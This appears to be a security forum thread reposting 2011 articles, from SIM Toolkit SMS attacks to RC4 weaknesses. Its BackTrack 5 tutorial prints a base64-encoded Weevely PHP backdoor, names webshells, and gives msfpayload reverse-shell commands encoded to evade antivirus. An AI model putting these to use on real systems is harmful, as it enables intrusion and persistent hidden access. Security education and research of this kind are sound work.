Nytro

[h=1]Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages[/h]By Lucian Constantin Dec 19, 2011 3:50 pm Attackers can force mobile phones to send premium-rate SMS messages or prevent them from receiving messages for long periods of time by leveraging a logic flaw in mobile telecommunication standards. The flaw was discovered by independent security researcher Bogdan Alecu, who demonstrated how it can be exploited at the DefCamp security conference in Romania on Saturday. Alecu exploited the way mobile devices process text messages intended for special applications called SIM Toolkits, which he said are preloaded on SIM cards by over 90 percent of mobile operators. The applications can perform actions that include checking credit or voice mail, calling emergency numbers or customer support, and even performing mobile banking, and typically appear on the phones as a menu or application bearing the operator's name. SIM Toolkits can receive commands through specially-formatted SMS messages, but in order for these commands to be executed successfully, the message headers must contain a valid digital signature. The vast majority of mobile phones don't display any notification when they receive SIM Toolkit messages, he said. Some wake from their sleep state, but no message is visible in the inbox and there's no other indication that a message was received. The encryption used to verify message authenticity is pretty solid and can't be cracked, Alecu said. Instead, his attacks rely on phones automatically returning error messages rather than executing legitimate commands. [h=2]Automatic Replies by Default[/h] Error replies are sent automatically. Users of some phones might see a message is being sent, but they can't usually stop it. Alecu tested his exploits on phones from various manufacturers. Only devices from Nokia have an option to ask phone owners to confirm sending a SIM Toolkit response. The option, "Confirm SIM Service Actions," is usually off by default, especially on phones configured by operators. He tested phones from High Tech Computer (HTC) and Samsung Electronics running stock Android firmware, and an LG Optimus One with CyanogenMod, a community-built version of the popular mobile operating system. None of them displayed a notification when sending SIM Toolkit responses, and he found no option to block responses. BlackBerry devices presented a similar behavior, he said. Windows Mobile 6.x devices and iPhones notified users a message was being sent, but offered no way to stop it. Alecu hadn't yet tested a Windows Phone 7 device. The sender of a SIM Toolkit service message can request that the phone reply via SMS either directly to the sender's number, or to the operator's message center, according to Alecu. [h=2]How Scammers Attack[/h] Those two options give rise to two different attack scenarios, he said. For the reply-to-sender option (SMS-SUBMIT), an attacker could force the sending of the error message to a premium-rate number using an SMS spoofing service. SMS spoofing is the practice of changing the originating number of a text message to anything the sender desires. This can have legitimate as well as malicious purposes, and there are many online services that provide the feature for a small fee. Some mobile operators have strict rules on setting up premium-rate numbers. Applicants might be asked to prove that they are a registered business and provide information about how the number will be used. Restrictions can also be placed on the text strings that a message must contain in order for the sender to be charged, which would limit this attack because the attacker can't control the content of the automatic response. However, the number and diversity of existing SMS scams is proof that obtaining a premium-rate number is not that difficult. If the second option (SMS-DELIVER-REPORT) is used, the error is sent to the operator's message center where it is interpreted as a message delivery failure. When messages can't be delivered, because a phone is turned off or outside the service area, operators usually attempt to resend the undelivered message every few minutes for a predefined period of time. When this happens, all subsequent messages intended for that number are placed in a queue to be delivered when the phone re-joins the network. Because receiving a bogus SIM Tookit message will always result in an error response, a loop is created between the message center and the phone, preventing the subscriber from receiving legitimate messages. This denial-of-service (DoS) condition is not permanent and after a while, typically 24 hours, the undelivered message is automatically discarded. However, if an attacker were to send seven bogus SIM Toolkit messages one after the other, the message center would attempt to deliver each of them for 24 hours, resulting in a week of SMS DoS. [h=2]Flaw Revealed[/h] Alecu demonstrated the attacks on SIM cards from multiple operators in Romania, Bulgaria, Austria, Germany and France. However, since the attacks exploit a logic flaw in the GSM standard and later mobile standards, he believes that the majority of operators that use SIM Toolkits are affected. Mitigating the attack is possible at both operator and device level. Operators can filter SIM Toolkit messages and restrict which numbers are allowed to send them. This would be an elegant solution, but Alecu has yet to find an operator that implemented it. Phone manufacturers could enforce confirmation for SIM actions from their software. However, this fix will probably not be as effective as message filtering at operator level, Alecu said. Firmware updates are not always easy to install, especially on older phones. Performing a firmware upgrade in the wrong way can render devices unusable and many affected phones might not even be supported anymore. The U.S. Computer Emergency Readiness Team (US-CERT) was notified of the problem in August 2010, and was asked to coordinate the disclosure process, Alecu said. He said Research In Motion (RIM) has contacted him and is working on a fix. "We are aware of the claims and are investigating them," Nokia spokesman Tomi Kuuppelomäki said. Samsung, HTC, RIM and Apple did not return a request for comment. Sursa: Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages | PCWorld Business Center

Aici nu exista fete sau baieti, exista membri, indiferent de sex. Motivul e simplu: se fac discriminari sexuale, etnice sau de orice alt fel. Dar credem in libertatea de exprimare, deci sunt permise.

"If it is not free, it is a product. If it is free, maybe you are the product."

Microsoft si-a lansat retea sociala (Video) Autor: Emilian Nedelcu Luni, 19 Decembrie 2011, ora 08:24 Compania Microsoft a lansat de curand o retea sociala, numita So.cl (se citeste "social"), care deocamdata este disponibila unui numar strans de persoane. Reprezentantii companiei au declarat de So.cl va fi o retea sociala destinata studentilor, pentru a-i ajuta sa-si impartaseasca informatii in mod rapid, sa construiasca pagini sau sa obtina rapid informatii, pentru a transforma Internetul si retelele sociale existente intr-o mare sala de clasa. Similar, Facebook, cea mai mare retea sociala din lume, cu peste 800 de milioane de utilizatori, a fost destinata, initial, doar unui numar restrans de studenti. So.cl este un proiect de cercetare experimental, potrivit oficialilor Microsoft, care este disponibil studentilor din facultatile de informatica si de design din Washington University, Syracuse University si New York University. In timp, vor fi adaugate si alte universitati. So.cl a fost proiectat pentru studenti pentru a le extinde experienta educationala si pentru a-i ajuta sa regandeasca modul in care pot invata si comunica. Utilizatorii retelei pot scrie articole, care sa fie inconjurate de elemente precum fotografii, video sau text. Utilizatorii pot identifica alti utilizatori cu interese similare, iar reteaua permite construirea de comunitati in jurul unui anumit scop (educational). Pana in acest punct, reteaua So.cl nu spune nicio noutate, toate aceste functionalitati fiind prezente, spre exemplu, si in Facebook. Utilizatorii So.Cl pot urmari alte persoane, sau pot seta feed-uri. De asemenea, utilizatorii pot urmari doar anumiti oameni sau pot vedea ce scriu toti prietenii inregistrati. Sursa: Microsoft si-a lansat retea sociala (Video)

Nu, asta e Gecko al nostru: Gecko (layout engine) - Wikipedia, the free encyclopedia

A, facut de tine, felicitari. Dar parca arata mai bine prima versiune.

Glume cu "bucatarie", sigur e fata. Bine ai venit.

Reverse Engineering Mac OS X Mac OS X - 2005 and before Mach-O Infection.ppt (presentation) Breaking Mac OS X.ppt (presentation) Hacking Mac OS X Kernel for unsupported machines.pdf (paper) MacOS Kernel Insecurity.pdf (presentation) Overriding Mac OS X.pdf (paper) A Debugger with Gui in OS X.pdf (paper) - 2006 Abusing Mach on Mac OS X.pdf (paper) - 2007 Hacking Leopard.pdf (paper) Inside the Mac_OS X_kernel.pdf (paper) - 2008 BlackHat-Japan-08-Miller-Hacking-OSX.pdf (presentation) BH-US-08-Dtrace The Reverse Engineer’s Unexpected Swiss Army Knife (presentation) iRK – Crafting OS X Kernel Rootkits (presentation) RETrace – Applied Reverse Engineering on OS X – defcon-16.pdf (presentation) Under the iHood – REcon 2008.pdf (presentation) Covering-tracks-Mac-OS-leopard_5991.pdf (paper) OSX_Rootkits – the next level.pdf (presentation) - 2009 Advanced Mac OSX Rootkits.pdf (paper) Defcon-17-bosse_eriksson-kernel_patching_on_osx.pdf (presentation) D1T1 – Dino Dai Zovi – Mac OS Xploitation.pdf (presentation) Advanced-Mac-OS-X-rootkits.pdf (presentation) Dynamic Tracing for Exploitation and Fuzzing-final.pdf (presentation) Mac-os-malware-analysis_33178.pdf (paper) Objective-c-internals.pdf (presentation) Hacking Macs for Fun and Profit – csw09-daizovi-miller.pdf (presentation) Macos xploitation-source2009.pdf (presentation) Debugging Cocoa with DTrace.pdf (paper) BlackHat-DC-09-Iozzo-Macho-on-the-fly.pdf (presentation) Dynamically Overriding Mac OS X – Down the Rabbit Hole.pdf (presentation) Encryption Wrapper on OSX.pdf (presentation) - 2010 Function-hooking-for-OSX-and-Linux.pdf (presentation) Mac Os X Hacking SnowLeopard.ppt (presentation) BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-slides.pdf (presentation) BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf (paper) Post exploitation techniques on OSX and Iphone – eusecwest.pdf (presentation) Programacion de rootkits en Mac OS X.pdf (paper, in Spanish) - 2011 Defiling-Mac-OS-X-Kernel-Rootkits-Ruxcon.pdf (presentation) Hacking at mach2.pdf (presentation) The Apple Sandbox – BHDC2011-Paper.pdf (paper) The Apple Sandbox – BHDC2011-Slides.pdf (presentation) Battery Firmware Hacking.pdf (paper) iSEC_BH2011 – Macs in the Age of APT.pdf (presentation) iOS - 2009 BlackHat-Europe-2009-Miller-Iozzo-OSX-IPhone-Payloads-whitepaper.pdf (paper) - 2010 iPhone Rootkit Toorcon 2010.pdf (presentation) D2T1 – Cedric Halbronn and Jean Sigwald – iPhone Security Model.pdf (presentation) - 2011 D1T2 – Laurent Oudot – Extracting Senstive Data from Your iPhone.pdf (presentation) D2T2 – Jean-Baptiste Be?drune & Jean Sigwald – iPhone Data Protection in Depth.pdf (presentation) Auditing iPhone and iPad applications – van Sprundel.ppt (presentation) Practical Consideration of iOS Device Encryption Security.pdf (paper) Apple iOS 4 Security Evaluation.pdf (presentation) BH_US_11_DaiZovi_iOS_Security_WP.pdf (paper) BH_US_11_Belenko_iOS_Forensics_Slides.pdf (presentation) BH_US_11_Belenko_iOS_Forensics_WP.pdf (paper) BH_US_11_Esser_Exploiting_The_iOS_Kernel_Slides.pdf (presentation) BH_US_11_Esser_Exploiting_The_iOS_Kernel_WP.pdf (paper) D2T1 – Stefan Esser – iPhone Exploitation – One ROPe to Bind Them All.pdf (presentation) D2 SIGINT – Keith Lee – iPhone Espionage.pdf (presentation) D1T1 – Stefan Esser – Antid0te 2.0 – ASLR in iOS.pdf (presentation) SysScan-Singapore-Targeting_The_IOS_Kernel.pdf (presentation) Sursa: Papers | Reverse Engineering Mac OS X

[h=3]SEH Hooking[/h][h=2]Saturday, December 17, 2011[/h] In this example, I will cover a method of hooking which uses SEH (Structured Exception Handling) in order to hook code in any location without overwriting the code. This method of hooking is very much alike the SEH Hooking which is used by many debuggers to place breakpoints, but has two small differences. Instead of writing INT3 Breakpoints and catching the BREAKPOINT Exception, I'm setting the memory to PAGE_NOACCESS and catching the ACCESS_VIOLATION Exception. Instead of writing the address of my handler to the PEB directly, I'm using a VEH (Vectored Exception Handler), which is being added using the AddVectoredExceptionHandler() WinAPI Function. This method of hooking works by modifying the protection of a byte of memory at the location of our hook to PAGE_NOACCESS. When this memory is executed, our VEH catches an ACCESS_VIOLATION Exception. It then checks the instruction pointer to see if the violation occurred at the location of our hook. If this ACCESS_VIOLATION is not our hook, we return CONTINUE_SEARCH to allow other handlers to work with the exception. However, if it is our hook, we do 3 things: Execute our hook's callback Restore the memory access to its original state Set the trap flag, which will trigger a single step We then return CONTINUE_EXECUTION. This time, the hooked code executes it's first byte flawlessly and then triggers a SINGLE_STEP Exception. This single step is a result of setting the trap flag, and it allows us to set the hooked memory back to PAGE_NOACCESS so our hook will execute again the next time the hooked memory is accessed. Since our exception handler's ContextRecord contains a pointer to the top of the stack, we are also able to access function arguments and find return addresses. Because of this, we can block the execution of a function or change the input, just like in a normal hook. To block execution, we can place a JMP [ReturnAddressFromStack] in our hook handler. While this jumps right back into execution and skips steps 2 and 3 of our exception handling, it is jumping back to the calling function and not the hooked code. The NOACCESS remains in place for next time. While this rendition of SEH Hooking isn't flawless, it does illustrate the concept and get the job done. In most cases, if you plan on using SEH Hooking, I would recommend using INT3 Breakpoints, though. This method, however, is a good way to bypass modification detection. While programs may checksum their code, they don't usually verify the memory protection of every page in the program. In the example code, I hook the MessageBoxA() WinAPI Function. Inside my handler, I call printf() to print the caption and text to the console. I then block execution of MessageBoxA(). Sursa: Rev++: SEH Hooking

[h=3]Intro to javascript malware analysis[/h] Posted by Ax0n I am by no means an expert on this stuff. A few weeks ago, I ran across some suspicious links in spam and decided to see where they led. Some of them claimed to be from financial institutions that I have absolutely no connection to, and claimed that some transaction had failed to occur. Others were variants of shipping confirmation scams, pharmacy junk, etc. I wish I could say that I have no idea how people fall for these, but the fact is that some people will literally click on anything that shows up in their inbox, open any attachment and follow any link, no matter how blatantly fake we professionals think these scams are. What lay at the tail end of all the script="http://some-site/whatever.js" includes and document.location redirects? A webpage that'd been owned, filled with a huge pile of nonsensical jibberish that could barely pass as javascript, which happened to be part of the Blackhole Exploit Kit. I've done my share of picking apart obfuscated javascript before, but it had been a while. I gave a presentation of this same thing at KC2600 a few weeks ago. Then, this week, a colleague of mine who missed the meeting ran into the same thing in the wild. I passed on what I'd learned, and decided it might be time to write it up with a little more detail than I did a few weeks back. He made this quick video that covers how he was able to de-obfuscate this particular sample: By now, I've seen several different obfuscation schemes for BlackHole, but once it's decoded, it all looks about the same. The introductory basics are simple. Minimize the potential of infection by using a non-privileged account (and perhaps an OS other than Windows) and/or minimize the impact of a successful infection by running a virtual machine that you can blow away or revert to a snapshot of a known clean state. For the malware I'm using in this example, either (or both) of the above criteria will be ample to keep things from getting out of control. Other malware may be more insidious or may target non-Windows platforms. I have a few friends that have unwittingly infected their own workstations while trying to analyze things. Play safe. Once you have a safe lab environment, your goal is to examine a suspicious link and dissect it. In my case, I was able to find a few links to malware in my personal mail's spam folder. For the demo at KC2600, I used Malware Domain List to find some Blackhole samples. In the wild, there may be any number of redirects ahead of the malware. You may see a shortened URL (through goo.gl, tinyurl, etc) which goes to a sparse HTML page with several calls to javascripts hosted on various sites, and those javascripts may simply be a document.location pointing to the malware. I usually stick with curl or wget to pull down suspicious links, and then I keep looking at the content and following the redirects until I strike gold. The javascript itself is ugly once you get to it. Sometimes, the byte array is only a few (really long) lines. Other times, like this sample, each byte of the obfuscated data is on a new line, like this: You'll see a few interesting things. There's an "e=eval;" line near the bottom, and then "e©;" after that. It doesn't take a coding genius to realize that this is a way to call eval© without triggering some IDS signatures that look for "eval(". Many samples I saw weren't quite this obvious. In fact, the script in the video has the eval alias in a different part of the script. In fact, the script in the video varies in several ways. To turn this cryptic payload into something that resembles actual javascript, there's a post on SANS ISC from several years ago covering a few methods. I went with the so-called Tom Liston Method, essentially trying to wrangle the decoded stuff that was destined for the exec function into a document.write within a textarea box instead. Note: I ran into one sample of BlackHole that has a /textarea tag near the beginning, which would keep someone from using this trick to easily view the code with this trick, but I don't think it will exec the stuff behind it since it's been changed to a document.write. In the above example (and in the video), the content that is destined for exec is stored in variable "c", so you simply replace "e©;" with: document.write("<textarea cols="150" rows="100">" + c + "</textarea>"); But obviously, you need to use some brain power here to figure out what trickery they're using to call exec, and what the variable is that needs to be wrapped up in the above document.write command. You may also wish to mess with the rows and columns on the textarea. I know on my netbook, that textarea size is far too unweildy. On my desktop, it's almost perfect. Make sure the file is renamed as a .html, then load it up in your safe lab environment's browser, just in case something goes wrong. Voila. If you scroll through recent versions of BlackHole Exploit Kit, you'll see that it tries to load an embedded java applet and a PDF, both of which are designed to exploit recent vulnerabilities in JRE and Adobe Reader. Since I don't have Windows running in a VM environment (and I'm not keen on actually infecting any of my Windows boxes) I'm not entirely sure what gets loaded from there. I'm guessing the carberp trojan, given most of what I've read lately. If that's the case, a successful infection would likely block access to anti-malware sites, try to sabotage existing security software, and start gathering sensitive data such as card numbers and online banking credentials. Sursa: HiR Information Report: Intro to javascript malware analysis

[h=2]Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5[/h] December 16th, 2011|By: Hari Krishnan Web application analysis plays a major role while doing a vulnerability assessment/penetration test. Proper information about the web application (for example like type of plugins used; CMS type – whether it is joomla, wordpress, etc.) can help the pentester determine the right exploit to use, as well reduce the overall time spent in doing so. Backtrack 5 comes with a very good set of tools required for performing all necessary information gathering. Tools for performing web application analysis are: CMS Identification IDS/IPS Detection Open Source Analysis Web Crawlers Vulnerability Assessment and Exploitation Maintaining Access [h=2][/h] [h=2]CMS Identification:[/h] blindelephant cms-explorer whatweb [h=3]BlindElephant[/h] BlindElephant is a python based tool for fingerprinting the web applications. This tool basically attempts to discover the version used by comparing the static files at certain known locations against the hashes which are pre-computed for the versions of those files. The tool is fast, non-invasive, takes low bandwidth and is highly automated. Usage: root@root:/pentest/web/blindelephant/src/blindelephant#python BlindElephant.py [options] url appName We can use the appName as “guess” if we are not sure about the web application or plugin type used. [h=3]CMS-Explorer[/h] CMS-explorer is another web application fingerprinting tool (written in perl) which can be used to identify the type of cms used and hence, perform the attack according to the information. There are few advantages in this tool, such as checking for any vulnerability from OSVDB for the particular plugin or CMS detected, updating the list of WP, Drupal, verbosity, looking into themes, and so forth, all of which gives the pentester a lot of information for performing the PT. Usage: root@root:/pentest/web/cms-explorer# python cms-explorer.pl -url target -type type [options] [h=3]WhatWeb[/h] WhatWeb is again used to identify the type of content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries and servers used. This tool has over 900 plugins for scanning purposes, supporting proxy (including TOR), can defined with ip ranges similar to NMAP, fuzzing matching, and so forth. Usage: root@root:/pentest/web/whatweb# ./whatweb target.com ./whatweb –l will list the plugin list. [h=2]IDS-IPS detection[/h] While performing a VA/PT on a domain, there is the chance that IDS-IPS is installed. This can sometime stop various types of attacks performed on the domain. A lot of WAFs are sold to companies as a valid mitigation technique for web application vulnerabilities. Luckily, WAF is easy to detect because most of these use signature-based detection methods. Thus, the attacker can try to encode the attacking parameters and try to bypass the WAFs. Backtrack comes with two handy tools for detecting the IDS-IPS and they are waffit ua-tester [h=3]Waffit:[/h] Waffit is a web application firewall detection tool. Detecting the firewall behind the domain is a very important step during the penetration testing process. WAF can sometimes introduce vulnerabilities if it’s not configured. Analyzing them is also a major concern while doing a VA/PT. WAFs are usually easy to detect and they can be bypassed by encoding the attack parameters . Usage: root@root:~$python wafw00f.py Target.com : Furniture, Baby, Electronics, Toys,...: Target [h=2][/h] [h=2]Open-Source Analyses:[/h] Open-source analyses are conducted using tools like ghdb, revhosts, xssed, maltego . The ghdb and xssed are linked to websites, while the other two are tools. GHDB: GHDB stands for Google Hacking Database. The exploit-db team maintains a database for google dorks which can come handy for pentesters gathering information. We can use the dorks for finding certain types of vulnerable servers or other information. For example, a google dork like “Microsoft-IIS/6.0? intitle:index.of” can be used to detect the server which is running Microsoft IIS 6.0. Another advantage of this is that it gives a little anonymity, as well as helping pen testers to attack or perform a VA with more precision. Xssed: Xssed.com is another website that contains a list of cross-vulnerable websites, submitted by various authors. Pentesters can search for their target in the xssed.com database or check for other information that can be helpful during the VA/PT. Revhosts: Revhosts is a project for Passive information Gathering. It’s written in Python and likewise helps pentesters to gather information (i.e., the host, VirtualHost, DNS entry, directories, mail address, subnet, etc.). This tool comes both in GUI and console. [h=2]Web Crawlers:[/h] The final category of web application analyses is the web crawler. The tool found in BT5 is called webshag, and it comes in both GUI and console based. Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication Webshag has options like port scan, gathering basic information, spider, fuzzing Downlink: S C R T :: Attack : Downloads : Webshag. [h=2]Vulnerability Assessment and exploitation:[/h] The vulnerability assessment stage is where we scan our target for any loopholes or bugs. Before doing a vulnerability assessment, gathering information about the target will be more helpful. The information gathering phase remains the key step before performing further attacks, simply because it makes the work easier. So, for example in the first stage: in using the CMS scanners like BlindElephant, we scanned and found the version of the application installed. Here it is: joomla. Now in the Vulnerability assessment stage, we used scanner like joomscan. Below is the image showing the vulnerability in a particular site. Usage: ./joomscan.pl –u Target.com : Furniture, Baby, Electronics, Toys,...: Target or IP address The joomscan scans all the plug-ins installed and gives details about the vulnerabilities. We can use this information for further attacks. SqlMap: SqlMap is another good tool in the vulnerability assessment category. This tool can test whether the target url is vulnerable or not. Below is the example, where the highlighted text tells us that the parameter “newId” is vulnerable. The usage is as follows: ./sqlmap.py –u target.com -f Fimap: fimap is a python- based tool which can be used to find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. More modules and functionalities are being added to this tool, making it even more powerful. Fimap also allows us to add our own payloads. Usage: fimap -u IANA — Example domains -U defines the target url To scan a list of url from a text file, the command would be fimap -m -l ‘/tmp/urlscan.txt’ -m is for mass scanning -l is for list Scan websites using google dorks .fimap.py -g -q ‘inurl:include.php’ -g for searching from google -q stands for the query which is to be searched in google. Fimap can exploit the vulnerable target and can also upload an interactive shell for more exploitation Xsser: Xsser is an automatic -framework- to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing the filters and other mode of injection. Usage: ./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch="–referer"666.666.666.666?–user-agent"correctaudit" This tool gives information like attack url, browsers and the method of the attack. Once the vulnerable url is detected, we can open the url and check it to confirm. theHarvestor: theHarvester tool is used for gathering user names, their email accounts, hostnames/subdomains from public resources (like, for example, google, bing, etc.). This tool again helps the pentester during the initial stage of VA/PT. It can be found in the “Web open source assessment ” option under web vulnerability assessment. Usage: ./theHaervester.py –ld [target domain] –d [ data source] The domains and the emails related to the particular website are being extracted, which can help for further attacks or research about the target. Shodan: This is, again, another web-based assessment tool of particular usefulness for pentesters. It can be used to gather a range of intelligence about the target devices which are connected to the internet. We can, for example, search to see if any network devices like routers, Voip, Printers, cams etc. are in place. To search if any service is running in the domain, the syntax would be: Syntax: Hostname:target.com port:80,21,22 Or simply to find out the results about the hostname, then simply search for Syntax: Hostname:target.com W3af: W3af is auditing and web application attack tool. It’s basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle, all of which can be used accordingly. These modules in w3af comes with various sub modules like, for example, we can select sqli option in Audit module, assuming that we need to perform a particular type of auditing. The below diagram shows a brief flowchart of the target website and makes it’s more easy to understand. Once the scan is completed, the W3af framework shows detailed information about the vulnerabilities found in the target website which can be compromised accordingly for further exploitation. Once the vulnerability is found, we can configure the plugins in the “Exploit” tab and perform further attacks, which can help us to get a webshell in the target site. Another major advantage is W3af also comes with MSF for taking the attack to next level. The results can be exported to html format, also. [h=2]Maintaining Access:[/h] Once we have access to the target website, we need to maintain access for future use because we don’t want to be starting from square one again and again. In order to avoid this, we can upload the web shells or backdoors to the target website. And encoding your backdoor is also important, since it should not create noise once uploaded in the server. If it does, then the administrators can easily detect it and remove the backdoors. BT5 comes with few good options for uploading webshells. Weevely: Weevely is a stealthy PHP backdoor, designed to stay beneath the radar. It provides a telnet-like connection, using a dynamic probe of system like functions to bypass PHP security restrictions. Weevely seeks functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()), using the functions enabled on a remote server. The below code is a sample code of the backdoor created by the weevely. eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’)); Usage: To create a backdoor. Weevely.py –g –o filename –p password This will create a backdoor with a specific name and will be password protected. Upload to the target server and access the backdoor using the following command: Usage: weevely.py –t –u http://Remote-IP/backdoor.php -p infosec Webshells: Here is a list of specific web shells which can be used. These are useful in various situations, such as if the web application has a vulnerability (like file upload) or any others that can help us to upload the backdoors. Depending on the website type (for example, if the website is coded in php), then use the php based backdoors. The following web shells available are simple-backdoor.php php-backdoor.php jsp-reverse.jsp cmdjsp.jsp cmd-asp-5.1.asp cmdasp.aspx perlcmd.cgi cfexec.cfm MsfPayload: Metasploit can be used to create backdoors which can then be used for maintaining access in the target server. This can be done with the help of msfpayload. The steps for creating backdoor in msfpayload are as follows: We need to select the payload which we are going to use to get a Meterpreter shell spawned via a reverse TCP connection. The command would be: msf > msfpayload windows/meterpreter/reverse_tcp This payload needs two parameters: LHOST (attackers IP address), and the LPORT for selecting the port that we are going to use. The “R” is then used to give the output file in RAW data format so that we can encode it later on. Msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This will create the payload but it has to be encoded in order to avoid AV detection. This can be done using the msfencode option. In order to do this, we need to pipe (“|”) the output generated by msfpayload to msfencode. Msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> infosec.exe -e can be used to specify the type of encoding needed. Here I am using shikata_ga_nai encoding and –t for the type of file extension. Here it’s an exe file. Below is the image of the list of encoders available in MSF. Conclusion: These are but a few methods followed while performing an exploitation of a web application. Once we get the information about our target, try to perform a vulnerability assessment in order to get information about the loopholes which can be used. Once this is done, exploit the vulnerabilities and if necessary, upload a backdoor. As I’ve said before, encode the backdoors in order to avoid detection. Hope this helps you in finding vulnerability, exploiting and how to maintain access in your target. Sursa: Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5 | InfoSec Institute – IT Training and Information Security Resources

[h=3]What's the deal with RC4?[/h][h=2]Thursday, December 15, 2011 [/h] Jacob Appelbaum tweets: Does anyone have a good reading list on practically attacking RC4? I don't propose to give an exact answer to Jacob's question here, but his tweet caught my eye for a reason. You see, just the other week I advised implementers to avoid RC4 -- both because it's easy to misuse, and because it's has some real and theoretical flaws. But that doesn't mean any particular RC4 implementation is broken. Instead, I'd prefer you to view my advice as the crypto equivalent of "don't run with scissors", "don't run near the pool", or "don't run near the pool while carrying scissors". I don't know anyone who's actually lost an eye because they ignored these warnings, but I'll still yell this stuff at my kids. It's common sense. Still, that doesn't answer the burning question: how bad is RC4, really? RC4, the stream cipher for the rest of us First, some background. RC4 was invented in 1987 by Ron Rivest. It spent its first seven years as an RSA trade secret before it was eventually leaked to a public mailing list in 1994. The rest, as they say, is history. You could argue that RC4's popularity was inevitable. For one thing, it was already in widespread commercial use. It was fast in software, something that DES wasn't. More importantly, the scheme itself is dirt simple. You can fit the code for RC4 onto a T-shirt, with plenty of room left over for, well, another T-shirt. And don't forget that, once leaked, the 'alleged' RC4 was free. The scheme consists of two parts: a key scheduling algorithm (KSA), and a pseudo-random generator (PRG). To encrypt a message, you run the key through the key scheduler, which produces a scrambled array called the state vector. You then feed the state vector into the PRG, which continuously permutes it while outputting a series of bytes. You then XOR those 'keystream' bytes with your plaintext. RC4 is probably most famous for its (mis)use in 802.11 WEP. It's still used in WPA-TKIP (unsurprising, since TKIP is just a bandaid patch for WEP). But its use goes way beyond that. For one thing, it's a common ciphersuite for TLS, and as of a year or two ago it was even preferred by browsers like Chrome. Up until recently, Microsoft used it everywhere. Skype uses it to obfuscate (though not to encrypt) its communication protocol. It shows up in malware and a zillion crappy DRM packages. To make a long story short, you'll find RC4 anywhere the hardware was too weak, or the developers too lazy to use a better cipher. The plain stupid There are a few basic things you need to avoid when using any PRG-based stream cipher. These aren't specific to RC4, but for some reason they seem to crop up at a higher rate in RC4 implementations than with other ciphers. The big honking obvious one is that you can't re-use the same RC4 keystream to encrypt two different messages. I hope I don't need to go into the consequences, butthey're bad. Don't do it. You'd think this is so obvious that nobody could get it wrong, but that's exactly what Microsoft famously did back in 2005, encrypting different versions of a Word document with the same key. If you must use the same key for different messages, the solution is to combine the key with an Initialization Vector or 'nonce'. Unfortunately this can be problematic as well. Another big issue is ciphertext malleability. If you flip a bit in an RC4 ciphertext, you'll see the same bit flipped in the decrypted plaintext. This is awesome at parties. More to the point, it can lead to practical padding-oracle type attacks that totally compromise the security of your encryption.* The solution to the latter problem is simply to MAC your ciphertexts. Unfortunately, people don't use RC4 because they know what a MAC is -- they use RC4 because you can download the code from Wikipedia. So, again, I would say that this stuff tends to happen more than it should. Key Scheduling Leaving aside the stupid, the real problem with RC4 is the Key Scheduling Algorithm (KSA), which kind of sucks. Picture a brand new box of playing cards. Starting with the unshuffled deck, work systematically from top to bottom, swapping each card's position with another card in the deck. The position you're swapping to is determined by a few simple computations involving the original card's face value and the cryptographic key. Now do this with a stack of about five ordered decks and you've got the RC4 KSA. While this shuffle is thorough, the basic problem is that it isn't quite thorough enough. This leads to predictable patterns that show up in the first PRG output bytes. For example, Mantin and Shamir noted that the second output byte takes on the value '0' with about twice the probability it should. By itself that may not seem terribly useful, but for one thing: it's enough to practically determine whether an unknown algorithm is RC4, given about 128 keystreams on different (random) keys. From what I can tell, the first person to notice problems with KSA was Andrew Roos, who posted a paper to sci.crypt about a year after the leak. Aside from the fact that it was published on Usenet, Roos's result is notable for two reasons. First, he correctly identified use of concatenated IVs as a likely source of weakness in WEP implementations -- years before the FMS attack. Second, he gave recommendations that -- had they been followed -- would have prevented the whole thing. (Life lesson: don't publish important results in newsgroups.) FMS Roos's paper set the table for the most famous attack on RC4, and the one that people still associate with RC4, even though it's been improved upon substantially. This is, of course, the Fluhrer, Mantin and Shamir, or 'FMS' attack, which appeared in 2001. Just like Roos, FMS looked at the KSA and found it wanting -- specifically, they discovered that for certain weak keys, the first byte output by the PRG tends to be correlated to bytes of the key. These weak keys can be obtained by prependinga few chosen bytes (say, 3 of them) to an unknown, fixed, secret key. Given keystreams resulting from 60 such chosen keys, you can derive one byte of the secret portion of the key. A 16-byte key can therefore be computed from about 960 such keystreams. On the face of it this sounds pretty unlikely -- after all, how are you going to get an encryptor to prepend chosen bytes to their secret key. Fortunately the attack works fine even if the adversary just knows that the appropriate bytes were used. This works perfectly for implementations that prepend (or append) a known Initialization Vector to the WEP key. Simply by observing a few million IVs, an attacker can eventually collect enough keystreams to meet the FMS requirements. All of this would have be a historical footnote if it hadn't been for protocols like WEP, which (among its many problems) used a three-byte prepended IV. FMS was quickly demonstrated to work on WEP, then packaged into a neat tool and distributed. Klein, Dropping and Hashing There are two competing approaches to dealing with the FMS attack: Drop the first N bytes of the RC4 keystream, for values of N ranging from 256 to 3,072. Don't concatenate the IV to the key, hash the two together instead. The first option is sometimes referred to as RC4-drop[N], and the actual value of N has been subject to some debate. In 2006, Klein presented a super-charged variant of the FMS attack that reduced the number of needed IVs from millions down to about 25,000. More importantly, he showed that FMS-type attacks are still (borderline) viable even if you drop the first 256 bytes of the keystream. So 768 seems like a bare minimum to me, and some people will argue for much larger values. The second approach was adopted for WPA-TKIP, 